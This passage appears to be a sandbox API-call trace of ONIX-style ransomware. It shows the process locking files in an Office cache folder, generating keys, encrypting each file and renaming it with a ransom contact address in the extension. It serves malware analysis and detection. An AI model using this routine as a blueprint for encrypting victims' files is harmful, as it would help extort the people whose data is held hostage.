returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0115.309] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=7378792) returned 1 [0115.310] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x709768 [0115.310] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0115.310] GetProcessHeap () returned 0x410000 [0115.310] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0115.310] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0115.312] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0115.314] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0115.315] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0115.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x709768) returned 0x3680020 [0115.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x709768) returned 0x3d90020 [0115.317] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.317] ReadFile (in: hFile=0x498, lpBuffer=0x3680020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x709768, lpOverlapped=0x0) returned 1 [0115.827] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x709768, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0115.827] CloseHandle (hObject=0x498) returned 1 [0115.828] GetProcessHeap () returned 0x410000 [0115.828] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0115.828] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0115.830] GetProcessHeap () returned 0x410000 [0115.830] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0115.830] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0115.830] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0115.830] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0115.830] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0115.830] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.830] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.830] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0115.830] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.830] GetLastError () returned 0x0 [0115.830] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0115.830] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.831] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x228df5c, nNumberOfBytesToLockHigh=0x0) returned 1 [0115.831] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.831] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0115.833] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.833] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.833] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0115.833] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0115.833] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1 [0115.833] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76 [0115.833] GetProcessHeap () returned 0x410000 [0115.833] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x4d6b80 [0115.833] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0115.833] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0115.833] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=36233052) returned 1 [0115.833] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x228df5c [0115.833] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0115.833] GetProcessHeap () returned 0x410000 [0115.834] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0115.834] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0115.834] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0115.836] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0115.837] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0115.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x228df5c) returned 0x3680020 [0115.839] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x228df5c) returned 0x5910020 [0115.840] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.840] ReadFile (in: hFile=0x498, lpBuffer=0x3680020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x228df5c, lpOverlapped=0x0) returned 1 [0118.492] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x228df5c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0118.492] CloseHandle (hObject=0x498) returned 1 [0118.492] GetProcessHeap () returned 0x410000 [0118.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0118.493] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0118.495] GetProcessHeap () returned 0x410000 [0118.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0118.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0118.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0118.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0118.495] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0118.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0118.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0118.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0118.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0118.495] GetLastError () returned 0x0 [0118.496] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0118.496] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0118.496] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x165510, nNumberOfBytesToLockHigh=0x0) returned 1 [0118.496] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.496] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0118.498] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.498] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.498] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0118.498] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0118.498] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1 [0118.498] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75 [0118.498] GetProcessHeap () returned 0x410000 [0118.498] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x4d6b80 [0118.499] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0118.499] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0118.499] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1463568) returned 1 [0118.499] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x165510 [0118.499] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0118.500] GetProcessHeap () returned 0x410000 [0118.500] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0118.500] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0118.500] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0118.502] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0118.503] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.504] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x165510) returned 0x2b30020 [0118.504] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x165510) returned 0x3680020 [0118.505] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.505] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x165510, lpOverlapped=0x0) returned 1 [0118.582] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x165510, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0118.582] CloseHandle (hObject=0x498) returned 1 [0118.583] GetProcessHeap () returned 0x410000 [0118.583] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0118.583] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0118.604] GetProcessHeap () returned 0x410000 [0118.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0118.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0118.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0118.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0118.604] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0118.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0118.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0118.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0118.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0118.604] GetLastError () returned 0x0 [0118.604] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0118.604] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0118.604] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaec3a, nNumberOfBytesToLockHigh=0x0) returned 1 [0118.604] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.604] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0118.606] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.606] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.606] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0118.606] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0118.606] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1 [0118.607] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88 [0118.607] GetProcessHeap () returned 0x410000 [0118.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x449878 [0118.607] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0118.607] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0118.607] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=715834) returned 1 [0118.607] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaec3a [0118.607] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0118.607] GetProcessHeap () returned 0x410000 [0118.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0118.607] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0118.607] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0118.609] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0118.610] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaec3a) returned 0x2680020 [0118.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaec3a) returned 0x2b30020 [0118.612] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.612] ReadFile (in: hFile=0x498, lpBuffer=0x2680020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xaec3a, lpOverlapped=0x0) returned 1 [0118.648] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaec3a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0118.648] CloseHandle (hObject=0x498) returned 1 [0118.648] GetProcessHeap () returned 0x410000 [0118.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0118.648] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all 